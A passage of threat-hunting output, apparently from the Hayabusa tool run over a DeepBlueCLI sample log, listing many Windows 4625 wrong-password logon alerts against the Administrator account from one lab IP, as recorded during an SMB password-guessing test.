NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: 